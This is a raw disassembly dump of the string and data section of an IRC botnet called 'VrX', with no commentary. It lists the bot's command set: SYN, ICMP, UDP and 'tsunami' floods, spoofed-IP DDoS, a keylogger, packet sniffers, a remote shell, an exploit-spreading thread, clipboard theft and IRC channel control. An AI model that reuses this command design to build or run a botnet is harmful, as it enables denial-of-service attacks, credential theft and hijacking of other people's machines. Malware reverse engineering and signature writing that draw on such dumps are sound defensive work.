aAd db 'ad',0 ; DATA XREF: sub_401ACD+4E79�o
align 4
aAdvscan db 'advscan',0 ; DATA XREF: sub_401ACD+4E62�o
aPsc db 'psc',0 ; DATA XREF: sub_401ACD+4E4B�o
aPortscan db 'portscan',0 ; DATA XREF: sub_401ACD+4E34�o
align 10h
aC_a db 'c_a',0 ; DATA XREF: sub_401ACD+4E0E�o
aC_action db 'c_action',0 ; DATA XREF: sub_401ACD+4DF7�o
align 10h
aC_pm db 'c_pm',0 ; DATA XREF: sub_401ACD+4DE0�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401ACD+4DC9�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_401ACD+4DB2�o
align 4
aScan_0 db 'scan',0 ; DATA XREF: sub_401ACD+4D9B�o
align 10h
aRd db 'rd',0 ; DATA XREF: sub_401ACD+4D84�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_401ACD+4D6D�o
align 10h
aNazel3 db 'NAZEL3',0 ; DATA XREF: sub_401ACD+4D3F�o
; sub_401ACD+4D56�o
align 4
aWonk db 'wonk',0 ; DATA XREF: sub_401ACD+4D28�o
align 10h
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401ACD+4D11�o
align 4
dword_42B05C dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4D04�o
aFailedToSta_11 db '- Failed to start flood thread, error: <%d>.',0
align 4
dword_42B098 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4C95�o
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
aSkysyn db 'skysyn',0 ; DATA XREF: sub_401ACD+4C12�o
align 10h
aSyn db 'syn',0 ; DATA XREF: sub_401ACD+4BFB�o
; sub_401ACD+51DB�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_401ACD+4BE4�o
align 10h
unk_42B0E0 db 2Dh ; - ; DATA XREF: sub_401ACD+4BD7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_12 db '- Failed to start flood thread, error: <%d>.',0
align 10h
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401ACD+4B00�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401ACD+4AE9�o
; sub_413694:loc_4137C0�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401ACD+4AD2�o
; sub_413694:loc_4137A4�o
align 4
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401ACD+4ABB�o
; sub_413694+F1�o
align 10h
aClone_0 db 'clone',0 ; DATA XREF: sub_401ACD+4A8D�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_401ACD+4A64�o
align 10h
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401ACD+4A4D�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_401ACD+4A36�o
align 10h
aRename db 'rename',0 ; DATA XREF: sub_401ACD+4A1F�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_401ACD+4A08�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_401ACD+49F1�o
align 4
aE: ; DATA XREF: sub_401ACD+49DA�o
; .data:00438770�o ...
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_401ACD+49C3�o
aHadeth3 db 'HADETH3',0 ; DATA XREF: sub_401ACD+4995�o
; sub_401ACD+49AC�o
aDe db 'de',0 ; DATA XREF: sub_401ACD+497E�o
align 10h
aDelay db 'delay',0 ; DATA XREF: sub_401ACD+4967�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_401ACD+4950�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_401ACD+4939�o
; sub_401ACD+6B0C�o
align 4
aTsn db 'tsn',0 ; DATA XREF: sub_401ACD+4922�o
aTsunami db 'tsunami',0 ; DATA XREF: sub_401ACD+490B�o
aT3 db 't3',0 ; DATA XREF: sub_401ACD+48F4�o
align 4
aTarga3 db 'targa3',0 ; DATA XREF: sub_401ACD+48DD�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_401ACD+48C6�o
aC_part db 'c_part',0 ; DATA XREF: sub_401ACD+48AF�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_401ACD+4898�o
aC_join db 'c_join',0 ; DATA XREF: sub_401ACD+4881�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_401ACD+486A�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_401ACD+4853�o
align 10h
aC_m db 'c_m',0 ; DATA XREF: sub_401ACD+483C�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_401ACD+4825�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_401ACD+480E�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_401ACD+47F7�o
align 4
aM_0: ; DATA XREF: sub_401ACD+47E0�o
; .data:004387C8�o ...
unicode 0, <m>,0
aCy db 'cy',0 ; DATA XREF: sub_401ACD+47B2�o
align 10h
aCycle db 'cycle',0 ; DATA XREF: sub_401ACD+479B�o
align 4
aA: ; DATA XREF: sub_401ACD+4784�o
; .data:0043878C�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_401ACD+476D�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_401ACD+473F�o
aAa db 'aa',0 ; DATA XREF: sub_401ACD+4728�o
align 10h
aAddalias db 'addalias',0 ; DATA XREF: sub_401ACD+4711�o
align 4
aKl db 'kl',0 ; DATA XREF: sub_401ACD+46FA�o
align 10h
aKilllog db 'killlog',0 ; DATA XREF: sub_401ACD+46E3�o
aGh db 'gh',0 ; DATA XREF: sub_401ACD+46BA�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_401ACD+46A3�o
unk_42B254 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406163�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_42B270 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406159�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
aSend_0 db 'send',0 ; DATA XREF: sub_401ACD+465B�o
; sub_409909+5F0�o
align 4
unk_42B29C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40611D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 4
unk_42B2BC db 2Dh ; - ; DATA XREF: sub_401ACD+4646�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_42B2DC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406091�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
unk_42B2FC db 2Dh ; - ; DATA XREF: sub_401ACD+45BA�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 10h
aShare db 'share',0 ; DATA XREF: sub_401ACD+4567�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_401ACD+4527�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_401ACD+450F�o
align 4
unk_42B33C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_405FB9�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
unk_42B35C db 2Dh ; - ; DATA XREF: sub_401ACD+44E2�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 10h
aStart db 'start',0 ; DATA XREF: sub_401ACD+44AB�o
align 4
unk_42B388 db 2Dh ; - ; DATA XREF: sub_401ACD+4478�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
aNet db 'net',0 ; DATA XREF: sub_401ACD+4454�o
aStop db 'stop',0 ; DATA XREF: sub_401ACD+4426�o
; sub_401ACD+443D�o ...
align 4
aKeylog db 'keylog',0 ; DATA XREF: sub_401ACD+440F�o
align 4
aKeyloger db 'keyloger',0 ; DATA XREF: sub_401ACD+43F8�o
align 10h
dword_42B3E0 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD:loc_405EB8�o
aNoThreadFound_ db '- No thread found.',0
align 10h
dword_42B400 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+43E1�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_42B438 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+43B3�o
aFailedToSta_13 db '- Failed to start server, error: <%d>.',0
align 4
dword_42B46C dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4366�o
aServerRunnin_0 db '- Server running on Port: 113.',0
align 4
dword_42B498 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4356�o
aAlreadyRunning db '- Already running.',0
align 4
aIdent db 'ident',0 ; DATA XREF: sub_401ACD+4325�o
align 10h
unk_42B4C0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_405DE5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoVrxSnifferTh db '- No VrX sniffer thread found.',0
unk_42B4EC db 2Dh ; - ; DATA XREF: sub_401ACD+430E�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVrxSnifferStop db '- VrX sniffer stopped. (%d thread(s) stopped.)',0
unk_42B528 db 2Dh ; - ; DATA XREF: sub_401ACD+42E0�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_14 db '- Failed to start sniffer thread, error: <%d>.',0
unk_42B564 db 2Dh ; - ; DATA XREF: sub_401ACD+4271�o
db 3, 34h, 2
db 53h ; S
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVrxPacketSniff db '- VrX packet sniffer active.',0
align 10h
unk_42B590 db 2Dh ; - ; DATA XREF: sub_401ACD+420A�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_0 db '- Already running.',0
aSniffer db 'sniffer',0 ; DATA XREF: sub_401ACD+41D5�o
dword_42B5B8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD:loc_405C95�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 4
dword_42B5E4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+41BE�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 10h
dword_42B620 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+4190�o
aFailedToSta_15 db '- Failed to start sniffer thread, error: <%d>.',0
align 4
dword_42B65C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+4121�o
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 4
dword_42B68C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+40BA�o
aAlreadyRunni_1 db '- Already running.',0
align 4
aOn db 'on',0 ; DATA XREF: sub_401ACD+409A�o
; sub_401ACD+41EA�o ...
align 10h
aPsniff db 'psniff',0 ; DATA XREF: sub_401ACD+4085�o
align 4
aRf db 'rf',0 ; DATA XREF: sub_401ACD+406E�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_401ACD+4057�o
align 4
aCm db 'cm',0 ; DATA XREF: sub_401ACD+4040�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_401ACD+4029�o
aMirc db 'mirc',0 ; DATA XREF: sub_401ACD+4012�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401ACD+3FFB�o
aV: ; DATA XREF: sub_401ACD+3FE4�o
; .data:004387BC�o ...
unicode 0, <v>,0
aVisit db 'visit',0 ; DATA XREF: sub_401ACD+3FCD�o
align 4
aLi db 'li',0 ; DATA XREF: sub_401ACD+3FB6�o
align 10h
aList db 'list',0 ; DATA XREF: sub_401ACD+3F9F�o
align 4
aGt db 'gt',0 ; DATA XREF: sub_401ACD+3F88�o
align 4
aDel db 'del',0 ; DATA XREF: sub_401ACD+3F5A�o
aDelete db 'delete',0 ; DATA XREF: sub_401ACD+3F43�o
; sub_401ACD+453F�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_401ACD+3F2C�o
align 4
aKill db 'kill',0 ; DATA XREF: sub_401ACD+3F15�o
align 4
aKp db 'kp',0 ; DATA XREF: sub_401ACD+3EFE�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_401ACD+3EE7�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_401ACD+3ED0�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_401ACD+3EB9�o
aSe db 'se',0 ; DATA XREF: sub_401ACD+3EA2�o
align 10h
aO: ; DATA XREF: sub_401ACD+3E74�o
; .data:00438AEC�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_401ACD+3E5D�o
; sub_401ACD+583A�o ...
align 4
aPr db 'pr',0 ; DATA XREF: sub_401ACD+3E46�o
align 10h
aPrefix db 'prefix',0 ; DATA XREF: sub_401ACD+3E2F�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_401ACD+3E18�o
align 10h
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401ACD+3E01�o
align 4
aC_q db 'c_q',0 ; DATA XREF: sub_401ACD+3DEA�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_401ACD+3DD3�o
align 4
aKillthread db 'killthread',0 ; DATA XREF: sub_401ACD+3DA5�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_401ACD+3D77�o
aPt db 'pt',0 ; DATA XREF: sub_401ACD+3D60�o
align 4
aJ: ; DATA XREF: sub_401ACD+3D32�o
; .data:004387A4�o ...
unicode 0, <j>,0
aN: ; DATA XREF: sub_401ACD+3D04�o
; .data:004387C4�o ...
unicode 0, <n>,0
unk_42B784 db 2Dh ; - ; DATA XREF: sub_401ACD+3CCF�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401ACD+3C66�o
aRegister db 'register',0 ; DATA XREF: sub_401ACD+3C3D�o
align 10h
aPrivmsgSS_0 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_401ACD+3BE2�o
align 10h
aMix db 'mix',0 ; DATA XREF: sub_401ACD+3B0D�o
dword_42B7E4 dd 56495250h, 2047534Dh, 3A207325h, 6E696601h, 1726567h
; DATA XREF: sub_401ACD+3AB7�o
; sub_401ACD+3AF2�o
dd 0
dword_42B7FC dd 56495250h, 2047534Dh, 3A207325h, 72657601h, 6E6F6973h
; DATA XREF: sub_401ACD+3A7C�o
dd 1
dword_42B814 dd 56495250h, 2047534Dh, 3A207325h, 6E697001h, 167h
; DATA XREF: sub_401ACD+3A41�o
; sub_401ACD+3B62�o
aCtcp db 'ctcp',0 ; DATA XREF: sub_401ACD+39EC�o
align 10h
aNoticeSS_1 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401ACD+3951�o
; sub_401ACD+3991�o ...
align 10h
aNotice_0 db 'notice',0 ; DATA XREF: sub_401ACD+38F7�o
align 4
aMsg db 'msg',0 ; DATA XREF: sub_401ACD+3802�o
aChgnick db 'chgnick',0 ; DATA XREF: sub_401ACD+37BD�o
aNick_0 db 'nick',0 ; DATA XREF: sub_401ACD+36B5�o
; sub_401ACD+3CED�o
align 4
dword_42B85C dd 56495250h, 2047534Dh, 3A207325h, 43434401h, 4E455320h
; DATA XREF: sub_401ACD+369A�o
dd 64252044h, 2064252Eh, 25206425h, 64252064h, 1
dword_42B884 dd 636364h ; DATA XREF: sub_401ACD+361D�o
aJoinPart db 'join/part',0 ; DATA XREF: sub_401ACD+34C6�o
align 4
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_401ACD+34AB�o
; sub_401ACD+3712�o ...
aSI db '%s%i',0 ; DATA XREF: sub_401ACD+3490�o
; sub_40AAAC+4F�o ...
align 4
aPnick db 'pnick',0 ; DATA XREF: sub_401ACD+344F�o
align 4
aPartSS db 'part %s %s',0 ; DATA XREF: sub_401ACD+3434�o
; sub_401ACD+3520�o ...
align 4
aPartflood db 'partflood',0 ; DATA XREF: sub_401ACD+340D�o
align 4
aPartS db 'part %s',0 ; DATA XREF: sub_401ACD+33F2�o
aPart_0 db 'part',0 ; DATA XREF: sub_401ACD+33D0�o
; sub_401ACD+3D49�o
align 4
aJoinS db 'join %s',0 ; DATA XREF: sub_401ACD+33B5�o
; sub_401ACD+34F4�o ...
aJoin db 'join',0 ; DATA XREF: sub_401ACD+3393�o
; sub_401ACD+3D1B�o
align 4
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401ACD+3378�o
align 10h
aMode db 'mode',0 ; DATA XREF: sub_401ACD+3329�o
; sub_401ACD+47C9�o
align 4
aNoticeSS_0 db 'notice %s :%s',0 ; DATA XREF: sub_401ACD+330E�o
align 4
aNt db 'nt',0 ; DATA XREF: sub_401ACD+32BF�o
align 4
dword_42B90C dd 76697270h, 2067736Dh, 3A207325h, 1732501h, 0
; DATA XREF: sub_401ACD+32A4�o
dword_42B920 dd 7463h ; DATA XREF: sub_401ACD+3255�o
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_401ACD+323A�o
; sub_401ACD+385C�o ...
align 4
a_: ; DATA XREF: sub_401ACD+320B�o
; sub_401ACD+3275�o ...
unicode 0, <_>,0
aPm db 'pm',0 ; DATA XREF: sub_401ACD+31EB�o
; sub_401ACD+4756�o
align 4
unk_42B93C db 2Dh ; - ; DATA XREF: sub_401ACD+31BB�o
db 3, 34h, 2
db 56h ; V
db 72h, 58h, 20h
db 46h ; F
db 6Ch, 2 dup(6Fh)
db 64h ; d
db 2, 3, 2Dh
aSClonesLoadedT db ' %s clones loaded to %s:%s',0
align 4
aLoad db 'load',0 ; DATA XREF: sub_401ACD+3164�o
align 10h
aFlood db 'flood',0 ; DATA XREF: sub_401ACD+3143�o
align 4
aRinms db 'rinms',0 ; DATA XREF: sub_401ACD+312C�o
align 10h
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401ACD+3115�o
aRin db 'rin',0 ; DATA XREF: sub_401ACD+30FE�o
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401ACD+30E7�o
align 4
unk_42B9A4 db 2Dh ; - ; DATA XREF: sub_401ACD+30DA�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
unk_42B9E4 db 2Dh ; - ; DATA XREF: sub_401ACD+3068�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
aExploit db 'exploit',0 ; DATA XREF: sub_401ACD+2FE1�o
unk_42BA1C db 2Dh ; - ; DATA XREF: sub_401ACD+2FC5�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 4
unk_42BA48 db 2Dh ; - ; DATA XREF: sub_401ACD+2FA7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401ACD+2F83�o
align 4
unk_42BA88 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4049F7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 10h
aGet_1 db 'get',0 ; DATA XREF: sub_401ACD:loc_4049D9�o
; sub_401ACD+3F71�o
unk_42BAC4 db 3 ; DATA XREF: sub_401ACD+2E9A�o
a81VrxInvalidLo db '8,1-VrX- Invalid login slot number: %d.',0
align 10h
unk_42BAF0 db 3 ; DATA XREF: sub_401ACD+2E8F�o
a81VrxNoUserLog db '8,1-VrX- No user logged in at slot: %d.',0
align 4
dword_42BB1C dd 312C3803h, 5872562Dh, 7325202Dh, 0 ; DATA XREF: sub_401ACD+2E3A�o
unk_42BB2C db 3 ; DATA XREF: sub_401ACD:loc_4048F8�o
a81VrxPoweredBy db '8,1-VrX- Powered By VIrUs & zerX! zerX.Virus Rules! (VIrUs@Power-'
db 'Hackers.com).',0
dword_42BB7C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401ACD+2E08�o
aFailedToSta_16 db '- Failed to start secure thread, error: <%d>.',0
align 4
dword_42BBB8 dd 234032Dh, 75636573h, 3026572h, 7325202Dh, 73797320h
; DATA XREF: sub_401ACD+2D8E�o
dd 2E6D6574h, 0
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401ACD+2D88�o
align 10h
aSecuring db 'Securing',0 ; DATA XREF: sub_401ACD+2D81�o
align 4
unk_42BBEC db 2Dh ; - ; DATA XREF: sub_401ACD+2D0A�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToSta_17 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42BC2C db 2Dh ; - ; DATA XREF: sub_401ACD+2C86�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 4
dword_42BC58 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2C04�o
aFailedToSta_18 db '- Failed to start server thread, error: <%d>.',0
align 4
dword_42BC94 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2B95�o
; sub_411BCE+A8�o
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_42BCBC dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD+2AE2�o
aFindFile db 'Find file',0 ; DATA XREF: sub_401ACD+2ADD�o
align 4
dword_42BCD8 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401ACD+2ACA�o
aProcessList db 'Process list',0 ; DATA XREF: sub_401ACD+2AC5�o
align 4
unk_42BCF8 db 3 ; DATA XREF: sub_401ACD+2A52�o
a81VrxReconne_1 db '8,1-VrX- Reconnecting.',0
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_404512�o
; sub_401ACD:loc_409570�o ...
align 4
unk_42BD28 db 3 ; DATA XREF: sub_401ACD+2A30�o
a81VrxDisconnec db '8,1-VrX- Disconnecting.',0
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_4044F0�o
align 4
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_4044DA�o
; sub_401ACD+78C1�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+29FB�o
align 4
unk_42BD78 db 3 ; DATA XREF: sub_401ACD+29D4�o
a81VrxStatusRea db '8,1-VrX- Status: Ready. Bot Uptime: %s.',0
align 4
unk_42BDA4 db 3 ; DATA XREF: sub_401ACD+2995�o
a81VrxBotIdS_ db '8,1-VrX- Bot ID: %s.',0
align 4
unk_42BDBC db 2Dh ; - ; DATA XREF: sub_401ACD+2986�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToSta_19 db '- Failed to start list thread, error: <%d>.',0
align 4
dword_42BDF8 dd 234032Dh, 65726874h, 2736461h, 4C202D03h, 20747369h
; DATA XREF: sub_401ACD+2917�o
dd 65726874h, 2E736461h, 0
dword_42BE18 dd 627573h ; DATA XREF: sub_401ACD+28F1�o
unk_42BE1C db 3 ; DATA XREF: sub_401ACD+289F�o
a81VrxAliasList db '8,1-VrX- Alias list.',0
align 4
unk_42BE34 db 2Dh ; - ; DATA XREF: sub_401ACD+2884�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToSta_20 db '- Failed to start listing thread, error: <%d>.',0
dword_42BE6C dd 234032Dh, 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh
; DATA XREF: sub_401ACD+2815�o
dd 2E676Fh
unk_42BE84 db 3 ; DATA XREF: sub_401ACD+276D�o
a81VrxNetworkIn db '8,1-VrX- Network Info.',0
unk_42BE9C db 3 ; DATA XREF: sub_401ACD+273E�o
a81VrxSystemInf db '8,1-VrX- System Info.',0
align 4
unk_42BEB4 db 3 ; DATA XREF: sub_401ACD+26E9�o
a81VrxRemovingB db '8,1-VrX- Removing Bot.',0
unk_42BECC db 2Dh ; - ; DATA XREF: sub_401ACD+26CD�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToSta_21 db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_42BF08 dd 234032Dh, 636F7270h, 2D030273h, 6F725020h, 73656363h
; DATA XREF: sub_401ACD+2658�o
dd 696C2073h, 2E7473h
aFull db 'full',0 ; DATA XREF: sub_401ACD+2638�o
align 4
unk_42BF2C db 2Dh ; - ; DATA XREF: sub_401ACD+25D9�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunni_2 db ' Already running.',0
align 4
unk_42BF4C db 3 ; DATA XREF: sub_401ACD+2588�o
a81VrxUptimeS_ db '8,1-VrX- Uptime: %s.',0
align 4
unk_42BF64 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F8A�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
unk_42BF84 db 2Dh ; - ; DATA XREF: sub_401ACD+24B6�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
unk_42BFAC db 2Dh ; - ; DATA XREF: sub_401ACD+249A�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 4
unk_42BFD8 db 3 ; DATA XREF: sub_401ACD+2484�o
a81VrxGetClipbo db '8,1-VrX- Get Clipboard.',0
align 4
dword_42BFF4 dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_401ACD+2456�o
dd 2Dh
unk_42C00C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F13�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
unk_42C038 db 2Dh ; - ; DATA XREF: sub_401ACD+243F�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 4
unk_42C05C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403EE8�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
unk_42C088 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403EE1�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 4
unk_42C0B4 db 2Dh ; - ; DATA XREF: sub_401ACD+240D�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
unk_42C0D8 db 2Dh ; - ; DATA XREF: sub_401ACD+23BA�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_22 db '- Failed to start server thread, error: <%d>.',0
align 4
unk_42C114 db 2Dh ; - ; DATA XREF: sub_401ACD+234B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
